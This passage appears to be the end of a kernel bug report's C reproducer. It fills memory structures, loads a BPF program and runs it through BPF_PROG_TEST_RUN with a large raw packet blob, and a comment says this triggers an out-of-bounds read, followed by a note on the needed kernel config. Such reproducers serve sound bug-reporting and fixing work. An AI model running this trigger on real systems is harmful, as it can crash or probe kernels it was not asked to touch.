STORE_BY_BITMASK(uint8_t, , 0x200000002839, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002839, 0, 4, 4);
*(uint16_t*)0x20000000283a = 0;
*(uint32_t*)0x20000000283c = 0;
*(uint64_t*)0x200000002710 = 0x200000002840;
memcpy((void*)0x200000002840, "GPL\000", 4);
*(uint32_t*)0x200000002718 = 0;
*(uint32_t*)0x20000000271c = 0;
*(uint64_t*)0x200000002720 = 0;
*(uint32_t*)0x200000002728 = 0;
*(uint32_t*)0x20000000272c = 0;
memset((void*)0x200000002730, 0, 16);
*(uint32_t*)0x200000002740 = 0;
*(uint32_t*)0x200000002744 = 1;
*(uint32_t*)0x200000002748 = 0;
*(uint32_t*)0x20000000274c = 0;
*(uint64_t*)0x200000002750 = 0;
*(uint32_t*)0x200000002758 = 0;
*(uint32_t*)0x20000000275c = 0;
*(uint64_t*)0x200000002760 = 0;
*(uint32_t*)0x200000002768 = 0;
*(uint32_t*)0x20000000276c = 0;
*(uint32_t*)0x200000002770 = 0;
*(uint32_t*)0x200000002774 = 0;
*(uint64_t*)0x200000002778 = 0;
*(uint64_t*)0x200000002780 = 0;
*(uint32_t*)0x200000002788 = 0;
*(uint32_t*)0x20000000278c = 0;
*(uint32_t*)0x200000002790 = 0;
res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x200000002700ul, /*size=*/0x94ul);
if (res != -1)
r[2] = res;
/* BPF_PROG_TEST_RUN (cmd 0xa): prog_fd = r[2], data_size_in = 0x768 bytes of
 * packet data, repeat = 4. The out-of-bounds read fires during this call. */
*(uint32_t*)0x200000003a00 = r[2];
*(uint32_t*)0x200000003a04 = 0;
*(uint32_t*)0x200000003a08 = 0x768;
*(uint32_t*)0x200000003a0c = 0;
*(uint64_t*)0x200000003a10 = 0x200000002980;
memcpy((void*)0x200000002980, "\xe2\x88\x3d\xee\x0d\x53\x2a\x4f\x03\x02\x73\x22\x86\xdd\x60\x3a\x46\x43\x07\x32\x4c\x1a\x99\xbc\xfb\xa2\xf4\x21\xa7\x32\x0c\xe9\x9f\x2c\x7c\x23\xdd\x49\x02\xea\xaf\x29\x3b\x6f\xdf\x4c\x34\xf8\x81\x02\x58\xb2\x89\x1c\x02\x8e\xf4\x18\x79\xa3\x0a\x0c\xb5\x9f\x9f\x11\x8a\x1d\xe8\x9a\x4f\x4b\x13\xeb\x2b\xd8\xfe\xa8\x17\x3a\x38\x4f\xe3\xf2\xfe\xc4\x6f\xef\x79\x6e\x1c\x42\x39\x68\x83\xc6\xf9\xbc\x2a\x29\x48\xf0\x07\x6d\x00\xa5\xf2\xae\xe4\x59\xc9\x5d\xb5\x62\x90\x08\xbc\x38\xbb\x60\x68\x44\x3a\x72\xb7\x14\xaa\xb8\x93\x69\xda\x01\x2f\xf4\xcc\x0e\x58\xd1\xf1\x0a\xf1\x45\xd9\x8a\x39\x03\xe5\x1e\x67\x20\xce\x33\x17\x41\x87\xae\x06\xd4\x38\x76\xa2\xc6\xa1\xcb\xc9\x22\x27\x11\xb6\x4c\x2d\xc8\xcb\x27\xd7\x46\x6a\xa5\x6d\x15\x2a\x29\xda\x60\x80\xf9\x3d\xbb\x0b\x39\x95\xc7\x0c\x1c\x30\xd0\xa6\x66\xac\xd2\xe8\x8a\xc9\x03\x01\xf2\x04\xdc\xd9\xad\x54\x76\x1c\xa2\x95\x55\x79\xa4\x1b\xd1\xe1\x8f\x80\x1a\xbb\x63\x86\x74\x12\x98\xec\x9a\x0f\xe2\x7b\xe7\x10\xdd\xa2\x46\x3c\x15\x4c\x74\x9a\x18\x2d\x8a\x21\x60\x4e\x47\x14\x3a\xbb\x57\x40\x72\x0b\x60\x66\x9d\xb2\x69\x5a\x72\x16\xcb\x8f\x4e\x2a\x05\x1e\xb0\x26\x9c\x28\xb0\xf1\x83\x52\xdd\x61\xba\xd2\xee\x3a\x42\x2f\xc6\xb2\x3f\xe6\x3b\x6f\x1f\x30\x27\xbb\xf8\x14\xd6\xab\x11\x23\x8d\xdb\xf7\xa9\xa7\x7a\xb8\x6e\xf0\xc3\x52\xb9\xba\x12\x14\x8b\xab\x01\x79\xd0\x8f\x99\x57\x83\xf7\x81\xcb\x16\xff\x98\x14\x9c\xbc\xdd\x84\x9b\x61\x80\x45\x69\xdf\x6f\x1c\x2a\x21\xf3\xfb\xe9\xc8\xc5\xb5\x9a\x23\x48\x91\x5d\x3d\x9b\x9d\xc5\x85\x77\x5d\x1a\xdc\xc9\xc2\x05\x14\xb0\x4e\x8f\x5d\xec\x9f\x9c\xbf\x2c\xdb\x3c\xfc\xb3\x8d\xe2\x15\x48\xac\xff\xdd\xf2\x44\x22\xb6\xd8\xd9\x13\xc7\x4a\xd7\x69\x70\xd1\xd6\x6e\x3f\x0a\x26\x60\x24\x0d\x26\xea\x59\xdf\x42\x9e\x07\x80\xe5\xa8\x5e\xe3\xff\x36\x68\xbe\xce\xeb\x4a\x48\x57\x06\x9c\x9d\x8e\x0e\x64\xe5\xc2\x80\x99\xdb\x2c\x35\xea\x4f\x51\x2c\xc2\xd0\xde\x11\x46\x32\x5d\x81\xdd\x1b\xc9\xdc\x73\xc6\xa4\x98\xd2\xee\xef\xe4\xb4\x1a\x0e\x68\xdd\xe8\xad\x6b\xeb\x8e\x90\x6d\x69\xf0\x3f\x1f\x22\x2e\x4f\
x5f\x9d\xa6\x71\x01\xde\x62\xab\xf9\xcb\x87\xd8\xd8\x2f\xf2\x9a\x5c\x86\x8c\x4f\xeb\x66\x55\x8d\x54\x5b\x7c\xb9\xf1\x30\xe4\xcd\x51\xbc\xbb\x1b\x05\x5a\x13\xc8\xcd\xe1\x85\x21\xe8\xf7\x28\x02\xb8\x60\x03\xd4\x09\x59\x03\x56\x14\x97\x6f\xb3\xad\x2f\xf3\x10\x4b\xd7\x86\xd9\xfc\x07\x8d\x56\x93\x3b\xf9\x94\x95\x2e\x1a\x6e\x21\xcd\xc0\x9c\x08\xa9\x3a\x3a\x2b\xcd\xa0\x8c\x0f\xb6\x16\x3d\x38\x2b\xb1\xd6\x16\xd4\xe5\xf9\x3d\x03\x58\xd8\x26\x1e\xfd\x41\x32\xde\x52\xbe\xda\x7e\x44\x1b\x72\xa9\xb5\xaa\x94\x6c\xe1\xe3\x3f\x20\x53\xa4\x48\x03\x02\x0b\xf9\x34\xe0\x43\x33\x51\x5e\x42\xd0\xd1\x6e\x17\x89\x97\x00\xa7\x0c\x08\xfe\x5f\x78\xca\xcc\xcb\xec\xd0\xb8\xae\xdd\x95\xae\x3c\xa9\xe4\xa4\x3d\xc4\x79\x81\xfd\x50\xd7\x55\x77\xea\x9d\xe5\x32\x72\xb8\xbc\xe5\xc2\x99\x18\x09\xce\x78\x5f\x46\x75\xce\x4b\xde\x07\x0d\xf7\xf9\x53\xc4\xa0\x1c\x67\xb9\x2f\xb8\x8a\x16\x73\x91\x48\x0e\x0a\x9e\x34\x00\x13\xc9\x1b\x49\xf7\x91\x8f\xc5\xf2\x0b\x89\xe8\x22\x38\x23\x4c\xb8\xea\x71\x2b\x95\xae\x32\xb6\x74\xf6\x98\x64\xe0\x47\xc0\xd6\xbe\x0b\x54\x42\x68\x21\xb1\x50\x09\xf5\xb0\x3c\x9d\x07\x81\xa6\xd0\x35\x24\x98\x14\x49\x37\xa2\xa9\x2b\xcd\x21\xdd\x3d\x25\x05\xf8\xbe\xc2\x34\xcc\xf7\xf5\x58\x7c\x7f\xb7\x2f\xbb\xfd\xb2\x2f\xec\xef\x06\xe7\x83\xc7\x38\x36\x2a\xba\x2e\x7a\xb3\x6d\xab\xb1\xfa\x29\xf4\xbd\x3d\xdd\x82\x5e\xd0\x1f\xf8\xaa\xec\xe8\x57\xc9\x01\xd5\xa0\xcc\xf1\x41\x3c\x83\x7c\xa0\xef\x7f\xd5\x08\x77\x10\x15\x2a\x4b\xc4\x13\xfd\xb1\x55\x1e\xd5\x52\x58\x58\xc2\xed\x5d\xfd\x2b\x77\xf3\x83\xf1\x49\x21\x35\x4b\x97\xf0\x6c\xb2\x4b\x3d\xea\x8d\x8f\x5d\xe4\x70\x6f\x01\x1b\x6c\xcc\x63\x2c\x07\x88\xf6\x26\xb4\xd2\x7a\x62\x82\x6a\xfb\x42\xe9\x46\x68\x53\x11\x6b\xef\x4a\x73\x19\x7b\xe2\x92\xa4\x64\x8e\xa9\x4e\x87\xc1\x6d\x50\x3b\x1c\x85\x86\xfe\xe5\x43\x59\xdf\x0f\x7f\xcc\x43\x3c\x27\x35\x46\x44\x97\xfc\xe8\xeb\xf2\x33\xc8\x22\x81\x94\xf2\xfd\x25\xc4\x31\xb6\x42\x2a\xc2\x74\x49\x0e\x3b\x83\xe6\x02\x4f\x9f\x54\x37\xee\x62\x66\xa1\xde\x16\x4a\x94\x54\xd9\x78\xa6\xf8\x5d\x99\xfb\x20\xa0\xaf\x89\x48\x25\x34\
x8d\x42\x53\xd4\x21\xd2\x94\x22\x16\x16\x90\xdb\xa1\x49\x04\xa8\x76\x7c\x8e\xde\x67\x6a\x3b\x4e\x86\xcb\xfc\x1f\x30\x61\x68\x53\x7b\x91\x93\xa8\xfd\x31\x21\x45\x65\x64\xa6\x07\x9e\xe2\x67\xff\x93\x80\xfa\xb0\xc8\x6b\xaf\xeb\xa2\x0b\xc8\x79\x58\x9e\x60\x01\xe1\x45\xaa\xa8\x41\x87\x0d\xcd\x43\xe5\x8c\x6e\xcd\x22\xb0\x5f\x3b\xff\xda\xc2\x8d\x1c\x69\x98\x21\xc5\xbf\x63\x07\xdd\x6b\xa8\xc8\x11\xee\x3e\x88\xe9\xe9\x0c\x0b\x86\x18\x61\x73\x47\x3e\xf3\x1f\x9f\x2f\x76\x6c\x76\x58\xae\x38\x69\xab\x72\xb0\xd8\x13\xfe\x64\x06\xe3\x72\x30\xcf\x11\x49\xf2\xd2\x2b\x4f\xe7\x33\x0f\x89\x4c\x5c\xe9\x02\x2c\x1c\x11\x54\xa9\x73\x3f\xa2\xee\x93\x32\xee\xca\x72\x57\x30\x04\x3b\x17\xda\x37\x7c\x07\x72\x8b\x58\x53\x5e\x89\xf8\x52\xd6\x24\x40\xfc\xe9\x3f\x85\x5e\x6c\x41\xd9\x18\xeb\x3c\xde\x9e\xb9\x76\xef\x14\xd0\x23\x67\x79\x54\xb1\x38\xd5\xfb\x17\x3f\xd9\x4d\x82\x24\x1b\x63\x45\x32\x88\x76\x76\x4e\xa7\xc6\x71\x78\xe3\x94\x2a\x49\x9d\x92\x92\xa6\x15\xf5\x62\x7d\x66\xbc\x4c\x10\x46\x7d\x1a\xe2\x93\xd2\xa5\x96\x31\x32\x37\x10\xf5\xa0\xe1\x94\xfb\xe5\x80\xa4\x58\xd5\x64\xc8\xec\x8c\x80\x41\xf7\x02\xca\x3c\x7e\xfd\xb9\xc5\x10\x59\x9b\x97\x13\xe0\xb2\xf7\xc1\xef\x46\x5b\xae\x00\x96\x24\x4f\xfd\xe8\x9e\xd5\xcb\x97\x8f\xa8\xde\x22\xc7\x70\x9a\xb5\xf4\x2a\x74\x09\x06\x80\x0d\xc1\xce\x9a\xf2\x16\x06\x12\x42\xbf\xd3\x0a\xe4\xeb\xb5\xd5\xe3\xc3\x4f\x30\xef\xc7\xd4\x50\x33\x91\x64\xc0\x31\x19\xfb\xcf\xfe\x99\x62\xd0\xe2\x16\xb0\xf6\x73\x27\x6d\x64\x2a\x6e\xdf\xd1\x13\xa5\x70\xfe\x1d\xf9\xd2\x06\x9e\x7a\x25\xf0\x6b\xb3\xdb\xbb\x3c\xf9\x87\x90\x76\x96\xc9\xcb\xfd\x97\x4a\xb3\x7d\xb4\x31\x28\x6e\xa6\x7d\xcf\x08\x57\xe0\x86\x9a\xa2\xeb\xcc\xc3\x78\xdf\xc2\x32\x36\x6b\xfa\x48\xbf\x76\x17\x18\x7d\xe0\x8a\xbd\x05\xa4\x9d\x34\x5f\x2b\x70\xb5\x4c\x9a\x92\x50\xda\xf0\x23\x6e\xa3\x39\x52\xa8\x3f\x7d\x99\x90\xe2\x06\x99\x41\x55\xfa\x48\x74\xfa\x55\xaf\xa9\x30\x54\xd7\xca\x41\x5a\xb3\xf1\x11\xce\xb1\x01\x2e\x21\x92\xf1\x48\x35\x2a\x1e\x1c\x4c\x8a\x70\x3e\xef\xd7\x66\xa0\x30\xc0\x17\xd4\x5a\xbf\x17\xc7\x8c\xe5\xb0\
xf8\x57\x51\x25\x89\xb9\x5a\xe7\x6f\xc4\xff\xd1\xb7\x8f\xfa\x8d\xe5\x6e\xf3\xfe\xc2\xf0\x09\x4a\xae\x1a\xa2\x99\x05\x6f\x3d\x4a\x6c\x41\x11\xa9\x10\x81\x4d\x72\x8b\x65\x84\x51\xe2\xd9\xbb\x4b\x40\xf5\xec\x45\xa0\xdf\x2e\x0f\xc9\x9d\xe9\xf5\xb8\x69\xdd\x43\xf2\x94\x4a\x14\x2f\x9e\xe1\x00\x8d\x0c\xd8\xb7\x19\xa6\xad\x72\xea\x54\x48\x61\x63\x6c\x6c\x22\xec\xd8\x18\x2e\x46\xef\x7f\xb8\x3b\x1c\x6d\x05\x04\x8b\x65\x5e\x2c\xe8\x84\xbd\x32\x1a\xa8\x72\x06\x25\x86\xd6\x47\xa9\xd7\x71\x48\x9e\x0b\x46\x5e\xa4\x8e\x5e\xdd\x62\xbc\xea\xf6\x6b\xfe\x01\x75\x0d\xc3\x79\xae\x8c\x7b\x04\xd0\x9b\x6a\x56\xd0\x59\xe3\x59\x1e\x60\x87\x24\xf6\x90\x7a\x93\x68\x47\x35\x56\x88\x7c\xaa\x80\x0d\x06\x7f\xb1\x4d\x01\x89\xc7\x21\xaf\xb9\x0f\xa9\x05\x4d\x8f\x54\xe6\xcb\x36\x48\x9a\x39\xa4\x35\xe7\x78\xac\x83\xc5\x07\xa4\x11\xca\xd4\x39\xc6\x3a\xd8\x1a\x39\xc4\xfd\x2e\xf4\xbc\x9a\xc5\xef\x7d\x70\xb8\x2f\x11\x7c\x05\xb8\xae\xa8\x81\xde\xa6\xc7\x60\x81\x43\x53\x3b\xd0\x24\xcd\xe4\xc0\x23\x18\xa4\xd4\x59\x71\x7a\x24\x58\xbe\x76\x7b\x06\x4f\xb7\x8c\x50\x43\x81\xda\xe0\xd2\xae\xab\x07\x48\x89\x8a\x1f\xbc\xe9\xeb\x0f\x32\x88\xa2\x91\x2b\xe6\x3f\xc2\x23\x89\xca\x09\x66\x1e\xcd\xe2\x58\x33\x83\x20\x5c\x4a\x24\xc6\x06\xdf\x78\xa4\x28\xb4\x3a\x80\x12\x35\x10\x8a\xd5\xff\xab\x61\x61\x9b\x90\xbb\x27\x3e\x70\x5c\x58\x32\x78\x28\x56\xa4\x5d\x71\x64\x5a\x6d\x9c\xfd\x07\x8d\x90\x26\xdc\xba\x44\x94\x44\x7d\xf4\xc9\x25\xc8\x60\x23\xc8\x54\x7e\x27\xee\xf7\x95\x9f\xa4\x32\xe1\x78\xfa\xc3\x42\xd5\x00\x5d\x93\xf2\xd1\xcd\xf1\x18\xe5\x9f\x23\xea\x4e\xfa\xb0\x18\x62\x37\x16\x7f\x21\x6e\x5a\x8a\x89\x68\x0a\x8e\x52\xa2\x0d\xa5\x24\x82\x2c\x60\xa5", 1896);
*(uint64_t*)0x200000003a18 = 0;
*(uint32_t*)0x200000003a20 = 4;
*(uint32_t*)0x200000003a24 = 0x8462e620;
*(uint32_t*)0x200000003a28 = 0;
*(uint32_t*)0x200000003a2c = 0;
*(uint64_t*)0x200000003a30 = 0;
*(uint64_t*)0x200000003a38 = 0;
*(uint32_t*)0x200000003a40 = 0;
*(uint32_t*)0x200000003a44 = 0;
*(uint32_t*)0x200000003a48 = 0;
syscall(__NR_bpf, /*cmd=*/0xaul, /*arg=*/0x200000003a00ul, /*size=*/0x50ul);
return 0;
}
```
## Kernel Configuration Requirements for Reproduction
The vulnerability can be triggered with the kernel config in the attachment.